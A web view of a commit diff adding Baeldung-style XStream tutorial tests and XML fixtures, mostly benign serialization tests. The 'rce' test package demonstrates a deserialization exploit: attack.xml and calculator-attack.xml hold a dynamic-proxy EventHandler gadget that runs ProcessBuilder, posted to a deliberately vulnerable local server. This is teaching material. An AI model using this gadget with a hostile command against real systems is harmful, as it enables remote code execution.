iSharkFly-Docs/java-tutorials
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #6 from eugenp/master

Browse Source 
merge sync up
This commit is contained in:
vatsalgosar
2019-10-20 20:00:20 +05:30
committed by GitHub
parent db85c8f275
commit ade303a6de
20475 changed files with 1641579 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
xstream/src/test/java/com/baeldung/pojo/test/ComplexXmlToObjectAnnotationUnitTest.java
+52
View File
@@ -0,0 +1,52 @@
package com.baeldung.pojo.test;
import com.baeldung.complex.pojo.ContactDetails;
import com.baeldung.complex.pojo.Customer;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.thoughtworks.xstream.XStream;
import org.junit.Before;
import org.junit.Test;
import java.io.FileReader;
import static org.junit.Assert.assertNotNull;
public class ComplexXmlToObjectAnnotationUnitTest {
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamInstance();
xstream.processAnnotations(Customer.class);
}
@Test
public void convertXmlToObjectFromFile() throws Exception {
ClassLoader classLoader = getClass().getClassLoader();
FileReader reader = new FileReader(classLoader
.getResource("data-file-alias-field-complex.xml")
.getFile());
Customer customer = (Customer) xstream.fromXML(reader);
assertNotNull(customer);
assertNotNull(customer.getContactDetailsList());
}
@Test
public void convertXmlToObjectAttributeFromFile() throws Exception {
ClassLoader classLoader = getClass().getClassLoader();
FileReader reader = new FileReader(classLoader
.getResource("data-file-alias-field-complex.xml")
.getFile());
Customer customer = (Customer) xstream.fromXML(reader);
assertNotNull(customer);
assertNotNull(customer.getContactDetailsList());
for (ContactDetails contactDetails : customer.getContactDetailsList()) {
assertNotNull(contactDetails.getContactType());
}
}
}
xstream/src/test/java/com/baeldung/pojo/test/ComplexXmlToObjectCollectionUnitTest.java
+35
View File
@@ -0,0 +1,35 @@
package com.baeldung.pojo.test;
import com.baeldung.implicit.collection.pojo.Customer;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import java.io.FileNotFoundException;
import java.io.FileReader;
public class ComplexXmlToObjectCollectionUnitTest {
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamInstance();
xstream.processAnnotations(Customer.class);
}
@Test
public void convertXmlToObjectFromFile() throws FileNotFoundException {
ClassLoader classLoader = getClass().getClassLoader();
FileReader reader = new FileReader(classLoader
.getResource("data-file-alias-implicit-collection.xml")
.getFile());
Customer customer = (Customer) xstream.fromXML(reader);
Assert.assertNotNull(customer);
Assert.assertNotNull(customer.getContactDetailsList());
}
}
xstream/src/test/java/com/baeldung/pojo/test/XmlToObjectAliasIntegrationTest.java
+34
View File
@@ -0,0 +1,34 @@
package com.baeldung.pojo.test;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.baeldung.pojo.Customer;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import java.io.FileNotFoundException;
import java.io.FileReader;
public class XmlToObjectAliasIntegrationTest {
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamInstance();
xstream.alias("customer", Customer.class);
}
@Test
public void convertXmlToObjectFromFile() throws FileNotFoundException {
ClassLoader classLoader = getClass().getClassLoader();
FileReader reader = new FileReader(classLoader
.getResource("data-file-alias.xml")
.getFile());
Customer customer = (Customer) xstream.fromXML(reader);
Assert.assertNotNull(customer);
}
}
xstream/src/test/java/com/baeldung/pojo/test/XmlToObjectAnnotationIntegrationTest.java
+33
View File
@@ -0,0 +1,33 @@
package com.baeldung.pojo.test;
import com.baeldung.annotation.pojo.Customer;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import java.io.FileNotFoundException;
import java.io.FileReader;
public class XmlToObjectAnnotationIntegrationTest {
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamInstance();
xstream.processAnnotations(Customer.class);
}
@Test
public void convertXmlToObjectFromFile() throws FileNotFoundException {
ClassLoader classLoader = getClass().getClassLoader();
FileReader reader = new FileReader(classLoader.getResource("data-file-alias-field.xml").getFile());
Customer customer = (Customer) xstream.fromXML(reader);
Assert.assertNotNull(customer);
Assert.assertNotNull(customer.getFirstName());
}
}
xstream/src/test/java/com/baeldung/pojo/test/XmlToObjectFieldAliasIntegrationTest.java
+36
View File
@@ -0,0 +1,36 @@
package com.baeldung.pojo.test;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.baeldung.pojo.Customer;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import java.io.FileNotFoundException;
import java.io.FileReader;
public class XmlToObjectFieldAliasIntegrationTest {
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamInstance();
xstream.alias("customer", Customer.class);
xstream.aliasField("fn", Customer.class, "firstName");
}
@Test
public void convertXmlToObjectFromFile() throws FileNotFoundException {
ClassLoader classLoader = getClass().getClassLoader();
FileReader reader = new FileReader(classLoader
.getResource("data-file-alias-field.xml")
.getFile());
Customer customer = (Customer) xstream.fromXML(reader);
Assert.assertNotNull(customer);
Assert.assertNotNull(customer.getFirstName());
}
}
xstream/src/test/java/com/baeldung/pojo/test/XmlToObjectIgnoreFieldsIntegrationTest.java
+36
View File
@@ -0,0 +1,36 @@
package com.baeldung.pojo.test;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.baeldung.pojo.Customer;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import java.io.FileNotFoundException;
import java.io.FileReader;
public class XmlToObjectIgnoreFieldsIntegrationTest {
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamInstance();
xstream.alias("customer", Customer.class);
xstream.ignoreUnknownElements();
}
@Test
public void convertXmlToObjectFromFile() throws FileNotFoundException {
ClassLoader classLoader = getClass().getClassLoader();
FileReader reader = new FileReader(classLoader
.getResource("data-file-ignore-field.xml")
.getFile());
Customer customer = (Customer) xstream.fromXML(reader);
Assert.assertNotNull(customer);
// System.out.println(customer);
}
}
xstream/src/test/java/com/baeldung/pojo/test/XmlToObjectIntegrationTest.java
+41
View File
@@ -0,0 +1,41 @@
package com.baeldung.pojo.test;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.baeldung.pojo.Customer;
import com.baeldung.utility.SimpleDataGeneration;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
import java.io.FileReader;
public class XmlToObjectIntegrationTest {
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamInstance();
}
@Test
public void convertXmlToObjectFromFile() throws Exception {
ClassLoader classLoader = getClass().getClassLoader();
FileReader reader = new FileReader(classLoader
.getResource("data-file.xml")
.getFile());
Customer customer = (Customer) xstream.fromXML(reader);
Assert.assertNotNull(customer);
}
@Test
public void convertXmlToObjectFromString() {
Customer customer = SimpleDataGeneration.generateData();
String dataXml = xstream.toXML(customer);
Customer convertedCustomer = (Customer) xstream.fromXML(dataXml);
Assert.assertNotNull(convertedCustomer);
}
}
xstream/src/test/java/com/baeldung/rce/AppUnitTest.java
+65
View File
@@ -0,0 +1,65 @@
package com.baeldung.rce;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.SocketException;
import java.net.URL;
import static org.junit.Assert.assertTrue;
/**
* Unit test which demonstrates a remote code exploit against the {@link App}
* server. Sends an XML request containing an attack payload to the {@code POST}
* endpoint.
*/
public final class AppUnitTest {
private App app;
/** start a new web server */
@Before
public void before() throws IOException {
app = App.createVulnerable(0);
app.start();
}
/** stop the web server */
@After
public void after() {
if (app != null)
app.stop();
}
/**
* Test passes when an {@link IOException} is thrown because this indicates that
* the attacker caused the application to fail in some way. This does not
* actually confirm that the exploit took place, because the RCE is a
* side-effect that is difficult to observe.
*/
@Test(expected = SocketException.class)
public void givenAppIsVulneable_whenExecuteRemoteCodeWhichThrowsException_thenThrowsException() throws IOException {
// POST the attack.xml to the application's /persons endpoint
final URL url = new URL("http://localhost:" + app.port() + "/persons");
final HttpURLConnection connection = (HttpURLConnection) url.openConnection();
connection.setRequestMethod("POST");
connection.setDoOutput(true);
connection.setUseCaches(false);
connection.setRequestProperty("Content-Type", "application/xml");
connection.connect();
try (OutputStream os = connection.getOutputStream(); InputStream is = AppUnitTest.class.getResourceAsStream("/attack.xml")) {
byte[] buffer = new byte[1024];
while (is.read(buffer) > 0) {
os.write(buffer);
}
}
final int rc = connection.getResponseCode();
connection.disconnect();
assertTrue(rc >= 400);
}
}
xstream/src/test/java/com/baeldung/rce/AttackExploitedException.java
+7
View File
@@ -0,0 +1,7 @@
package com.baeldung.rce;
/**
* Indicates a successful remote code execution attack has taken place.
*/
final class AttackExploitedException extends RuntimeException {
}
xstream/src/test/java/com/baeldung/rce/AttackExploitedExceptionThrower.java
+13
View File
@@ -0,0 +1,13 @@
package com.baeldung.rce;
/**
* Class which contains an action to throw {@link AttackExploitedException}.
* This helper is used by {@link AppTest} to determine when the remote code
* exploit has taken place.
*/
final class AttackExploitedExceptionThrower {
public void throwAttackExploitedException() {
throw new AttackExploitedException();
}
}
xstream/src/test/java/com/baeldung/rce/XStreamBasicsUnitTest.java
+82
View File
@@ -0,0 +1,82 @@
package com.baeldung.rce;
import com.thoughtworks.xstream.XStream;
import org.junit.Before;
import org.junit.Test;
import java.util.Collections;
import java.util.Map;
import static org.junit.Assert.assertEquals;
/**
* Demonstrates XStream basics
*/
public final class XStreamBasicsUnitTest {
private XStream xstream;
@Before
public void before() {
xstream = new XStream();
xstream.alias("person", Person.class);
}
@Test
public void whenWritePerson_thenWritesExpectedXml() {
Person person = new Person();
person.setFirst("John");
person.setLast("Smith");
String xml = xstream.toXML(person);
// @formatter:off
String expected = ""
+ "<person>\n"
+ " <first>John</first>\n"
+ " <last>Smith</last>\n"
+ "</person>";
// @formatter:on
assertEquals(expected, xml);
}
@Test
public void whenReadXmlAsPerson_thenReturnsNewPerson() {
// @formatter:off
String xml = ""
+ "<person>"
+ " <first>John</first>"
+ " <last>Smith</last>"
+ "</person>";
// @formatter:on
Person person = (Person) xstream.fromXML(xml);
Person expected = new Person();
expected.setFirst("John");
expected.setLast("Smith");
assertEquals(person, expected);
}
@Test
public void givenXmlRepresentationOfMap_whenDeserialize_thenBuildsMap() {
// @formatter:off
String xml = ""
+ "<map>"
+ " <element>"
+ " <string>foo</string>"
+ " <int>10</int>"
+ " </element>"
+ "</map>";
// @formatter:on
@SuppressWarnings("unchecked")
Map<String, Integer> actual = (Map<String, Integer>) xstream.fromXML(xml);
final Map<String, Integer> expected = Collections.singletonMap("foo", 10);
assertEquals(expected, actual);
}
}
xstream/src/test/java/com/baeldung/test/XStreamJettisonIntegrationTest.java
+47
View File
@@ -0,0 +1,47 @@
package com.baeldung.test;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.baeldung.pojo.ContactDetails;
import com.baeldung.pojo.Customer;
import com.baeldung.utility.SimpleDataGeneration;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class XStreamJettisonIntegrationTest {
private Customer customer = null;
private String dataJson = null;
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamJettisonMappedInstance();
xstream.processAnnotations(Customer.class);
}
@Test
public void convertObjectToJson() {
customer = SimpleDataGeneration.generateData();
xstream.alias("customer", Customer.class);
xstream.alias("contactDetails", ContactDetails.class);
xstream.aliasField("fn", Customer.class, "firstName");
dataJson = xstream.toXML(customer);
System.out.println(dataJson);
Assert.assertNotNull(dataJson);
}
@Test
public void convertJsonToObject() {
customer = SimpleDataGeneration.generateData();
dataJson = xstream.toXML(customer);
customer = (Customer) xstream.fromXML(dataJson);
System.out.println(customer);
Assert.assertNotNull(customer);
}
}
xstream/src/test/java/com/baeldung/test/XStreamJsonHierarchicalIntegrationTest.java
+44
View File
@@ -0,0 +1,44 @@
package com.baeldung.test;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.baeldung.pojo.ContactDetails;
import com.baeldung.pojo.Customer;
import com.baeldung.utility.SimpleDataGeneration;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class XStreamJsonHierarchicalIntegrationTest {
private Customer customer = null;
private String dataJson = null;
private XStream xstream = null;
@Before
public void dataSetup() {
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamJsonHierarchicalInstance();
xstream.processAnnotations(Customer.class);
}
@Test
public void convertObjectToJson() {
customer = SimpleDataGeneration.generateData();
xstream.alias("customer", Customer.class);
xstream.alias("contactDetails", ContactDetails.class);
xstream.aliasField("fn", Customer.class, "firstName");
dataJson = xstream.toXML(customer);
System.out.println(dataJson);
Assert.assertNotNull(dataJson);
}
@Test(expected = UnsupportedOperationException.class)
public void convertJsonToObject() {
customer = SimpleDataGeneration.generateData();
dataJson = xstream.toXML(customer);
customer = (Customer) xstream.fromXML(dataJson);
Assert.assertNotNull(customer);
}
}
xstream/src/test/java/com/baeldung/utility/XStreamSimpleXmlIntegrationTest.java
+57
View File
@@ -0,0 +1,57 @@
package com.baeldung.utility;
import com.baeldung.initializer.SimpleXstreamInitializer;
import com.baeldung.pojo.AddressDetails;
import com.baeldung.pojo.ContactDetails;
import com.baeldung.pojo.Customer;
import com.thoughtworks.xstream.XStream;
import org.junit.Assert;
import org.junit.Before;
import org.junit.Test;
public class XStreamSimpleXmlIntegrationTest {
private Customer customer;
private String dataXml;
private XStream xstream;
@Before
public void dataSetup() {
customer = SimpleDataGeneration.generateData();
SimpleXstreamInitializer simpleXstreamInitializer = new SimpleXstreamInitializer();
xstream = simpleXstreamInitializer.getXstreamInstance();
xstream.processAnnotations(Customer.class);
xstream.processAnnotations(AddressDetails.class);
xstream.processAnnotations(ContactDetails.class);
xstream.omitField(Customer.class, "lastName");
xstream.registerConverter(new MyDateConverter());
// xstream.registerConverter(new MySingleValueConverter());
xstream.aliasField("fn", Customer.class, "firstName");
dataXml = xstream.toXML(customer);
}
@Test
public void testClassAliasedAnnotation() {
Assert.assertNotEquals(-1, dataXml.indexOf("<customer>"));
}
@Test
public void testFieldAliasedAnnotation() {
Assert.assertNotEquals(-1, dataXml.indexOf("<fn>"));
}
@Test
public void testImplicitCollection() {
Assert.assertEquals(-1, dataXml.indexOf("contactDetailsList"));
}
@Test
public void testDateFieldFormating() {
Assert.assertEquals("14-02-1986", dataXml.substring(dataXml.indexOf("<dob>") + 5, dataXml.indexOf("</dob>")));
}
@Test
public void testOmitField() {
Assert.assertEquals(-1, dataXml.indexOf("lastName"));
}
}
xstream/src/test/resources/attack.xml
+12
View File
@@ -0,0 +1,12 @@
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target
class='com.baeldung.rce.AttackExploitedExceptionThrower'>
</target>
<action>throwAttackExploitedException</action>
</handler>
</dynamic-proxy>
</sorted-set>
xstream/src/test/resources/calculator-attack.xml
+16
View File
@@ -0,0 +1,16 @@
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target
class="java.lang.ProcessBuilder">
<command>
<string>open</string>
<string>/Applications/Calculator.app</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
xstream/src/test/resources/data-file-alias-field-complex.xml
+15
View File
@@ -0,0 +1,15 @@
<customer>
<firstName>XStream</firstName>
<lastName>Java</lastName>
<dob>1986-02-14 04:14:05.874 UTC</dob>
<contactDetailsList>
<ContactDetails contactType="Home">
<mobile>6673543265</mobile>
<landline>0124-2460311</landline>
</ContactDetails>
<ContactDetails contactType="Office">
<mobile>4676543565</mobile>
<landline>0120-223312</landline>
</ContactDetails>
</contactDetailsList>
</customer>
xstream/src/test/resources/data-file-alias-field.xml
+5
View File
@@ -0,0 +1,5 @@
<customer>
<fn>XStream</fn>
<lastName>Java</lastName>
<dob>1986-02-14 03:46:16.381 UTC</dob>
</customer>
xstream/src/test/resources/data-file-alias-implicit-collection.xml
+13
View File
@@ -0,0 +1,13 @@
<customer>
<firstName>XStream</firstName>
<lastName>Java</lastName>
<dob>1986-02-14 04:14:20.541 UTC</dob>
<ContactDetails contactType="Home">
<mobile>6673543265</mobile>
<landline>0124-2460311</landline>
</ContactDetails>
<ContactDetails contactType="Office">
<mobile>4676543565</mobile>
<landline>0120-223312</landline>
</ContactDetails>
</customer>
xstream/src/test/resources/data-file-alias.xml
+5
View File
@@ -0,0 +1,5 @@
<customer>
<firstName>XStream</firstName>
<lastName>Java</lastName>
<dob>1986-02-14 03:46:16.381 UTC</dob>
</customer>
xstream/src/test/resources/data-file-ignore-field.xml
+6
View File
@@ -0,0 +1,6 @@
<customer>
<firstName>XStream</firstName>
<lastName>Java</lastName>
<dob>1986-02-14 04:14:20.541 UTC</dob>
<fullName>XStream Java</fullName>
</customer>
xstream/src/test/resources/data-file.xml
+5
View File
@@ -0,0 +1,5 @@
<com.baeldung.pojo.Customer>
<firstName>XStream</firstName>
<lastName>Java</lastName>
<dob>1986-02-14 03:46:16.381 UTC</dob>
</com.baeldung.pojo.Customer>